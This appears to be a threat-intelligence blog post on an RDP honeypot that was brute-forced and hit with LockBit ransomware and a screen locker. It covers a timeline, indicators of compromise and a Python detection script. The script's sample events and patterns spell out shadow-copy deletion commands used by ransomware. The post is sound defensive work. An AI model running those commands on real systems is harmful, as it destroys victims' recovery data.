
Inside a Compromised RDP Server - Bruteforcing Leads to LockBit Ransomware

As more people work remotely, IT departments have an ongoing need to provide remote services to end users. Where a traditional VPN is not used, technologies such as Remote Desktop, Citrix and VMware are commonly used for remote access. However, they are not always configured securely.

During the height of the pandemic, we set up two servers with Remote Desktop exposed to the Internet and created a user named "hello" with no password. Obviously this is not a smart idea, but it demonstrates what can happen when unsecured assets are reachable directly from the Internet.

Scenario 1: Network Scanner Resulting in Abuse Complaint

A scanning tool was run from the server to look for other hosts listening on port 3389, which resulted in an abuse complaint from Hetzner Online GmbH. The complaint was as follows:
Figure 1: Abuse Complaint Received


It is good that Hetzner has automated monitoring systems that send abuse complaints without human intervention; it is one step in the right direction toward making the Internet a safer place.

Scenario 2: LockBit Ransomware

LockBit is a ransomware family that reportedly emerged in 2019. It operates under a ransomware-as-a-service (RaaS) model: the developers write the encryptor and distribute it to affiliates, who conduct the intrusions and deploy it on victim systems. When a victim pays, the developers take a percentage of the ransom as their commission.

In this scenario, the first unauthorized logon originated from the IP address 82.102.20.219; however, no malicious activity appeared to result from this login. Interestingly, three further logons were observed afterwards, leading up to a final logon during which the LockBit ransomware was deployed. A timeline of events is below:

Figure 2: Timeline of Events


Once the ransomware executable runs on the system, it deletes the Volume Shadow Copies as one of its steps to inhibit recovery. As files are encrypted, a ransom note named Restore-My-Files.txt is dropped:

Figure 3: Ransom Note
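The chain described above (a burst of failed RDP logons, a successful RemoteInteractive logon, then deletion of the Volume Shadow Copies) can be reconstructed from the Windows Security log after the fact. The script below is an added example written for this post, not code from the original article or from Sicehice, and it runs over constructed sample events rather than the honeypot's real log: the IP addresses, usernames and timestamps are invented, and the event records are a simplified subset of the fields that Event IDs 4625, 4624 and 4688 actually carry. It goes slightly beyond what the post observed by also matching the wmic and WMI variants of shadow copy deletion.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security events (not from the post's honeypot). IPs are
# from the documentation ranges, not the indicators listed in the post.
EVENTS = [
    {"time": "2020-06-01T10:00:00", "id": 4625, "ip": "198.51.100.7", "user": "admin", "logon_type": 10},
    {"time": "2020-06-01T10:00:30", "id": 4625, "ip": "198.51.100.7", "user": "administrator", "logon_type": 10},
    {"time": "2020-06-01T10:01:00", "id": 4625, "ip": "198.51.100.7", "user": "test", "logon_type": 10},
    {"time": "2020-06-01T10:01:30", "id": 4625, "ip": "198.51.100.7", "user": "user", "logon_type": 10},
    {"time": "2020-06-01T10:02:00", "id": 4625, "ip": "198.51.100.7", "user": "hello", "logon_type": 10},
    {"time": "2020-06-01T10:02:30", "id": 4624, "ip": "198.51.100.7", "user": "hello", "logon_type": 10},
    # A single guess that happens to succeed: no burst of failures precedes it.
    {"time": "2020-06-01T11:00:00", "id": 4625, "ip": "203.0.113.5", "user": "hello", "logon_type": 10},
    {"time": "2020-06-01T11:00:10", "id": 4624, "ip": "203.0.113.5", "user": "hello", "logon_type": 10},
    # Process creations once the interactive session is established.
    {"time": "2020-06-01T10:05:00", "id": 4688, "user": "hello",
     "cmdline": r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet"},
    {"time": "2020-06-01T10:05:05", "id": 4688, "user": "hello",
     "cmdline": r"wmic.exe shadowcopy delete"},
    {"time": "2020-06-01T10:06:00", "id": 4688, "user": "hello",
     "cmdline": r"C:\Windows\System32\notepad.exe Restore-My-Files.txt"},
]

# Command lines that remove Volume Shadow Copies: the vssadmin form seen in
# the post plus the wmic and WMI (PowerShell) equivalents.
SHADOW_DELETE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"Win32_ShadowCopy.*\bDelete\b", re.I),
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def bruteforce_then_success(events, threshold=5, window=timedelta(minutes=10)):
    """Return (ip, failures_in_window, success_time) for every successful
    RemoteInteractive logon (4624, LogonType 10) that was preceded by at least
    `threshold` failed logons (4625) from the same source IP within `window`."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            # Failed RDP attempts are logged with LogonType 3 when NLA is
            # enabled and LogonType 10 without it, so count them regardless.
            failures[e["ip"]].append(_t(e))
    hits = []
    for e in sorted(events, key=_t):
        if e["id"] != 4624 or e.get("logon_type") != 10:
            continue
        when = _t(e)
        n = sum(1 for f in failures[e["ip"]] if when - window <= f < when)
        if n >= threshold:
            hits.append((e["ip"], n, e["time"]))
    return hits


def shadow_copy_deletions(events):
    """Return (time, user, cmdline) for process creations (4688) whose command
    line deletes Volume Shadow Copies."""
    return [(e["time"], e["user"], e["cmdline"]) for e in events
            if e["id"] == 4688 and any(p.search(e["cmdline"]) for p in SHADOW_DELETE)]


if __name__ == "__main__":
    for ip, n, when in bruteforce_then_success(EVENTS):
        print(f"brute force followed by RDP logon: {ip} ({n} failures before {when})")
    for when, user, cmd in shadow_copy_deletions(EVENTS):
        print(f"shadow copy deletion at {when} by {user}: {cmd}")
```

Two caveats when running this against a real log: the 4688 command line is only populated when "Include command line in process creation events" is enabled in the audit policy, and the threshold and window should be tuned to the environment, since the post's first unauthorized logon came from a single successful guess that a failure-count rule like this one would not flag.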


The threat actor then returned to the system an hour later to run screensaver.exe, a piece of malware known as ScreenLocker that locks the screen and prevents the user from interacting with the system.

We have captured the indicators in our database and made them searchable on sicehice.com. As an example, you can use our Bulksearch feature to download a CSV-formatted list of lookups for these IPs.

Indicators of Compromise

IOC                               Type  Description
54.38.212.197                     IPv4  RDP Bruteforce IP
185.202.2.121                     IPv4  RDP Bruteforce IP
51.89.134.150                     IPv4  RDP Bruteforce IP
104.237.255.254                   IPv4  RDP Bruteforce IP
62.76.112.121                     IPv4  RDP Bruteforce IP
167.172.239.68                    IPv4  RDP Bruteforce IP
82.202.247.81                     IPv4  RDP Bruteforce IP
82.102.20.219                     IPv4  Unauthorized RDP Login
51.15.18.180                      IPv4  Unauthorized RDP Login
52.237.96.13                      IPv4  Unauthorized RDP Login
f9073cc6566ba11318b425a761f1ce17  MD5   ScreenLock Executable: screensaver.exe
1f4581b36253f0f5d63e68347d1744a7  MD5   LockBit Executable: 81F3696546327500.exe
bfc879a4a959a3bd23892448afbd75b6  MD5   Ransom Note: Restore-My-Files.txt
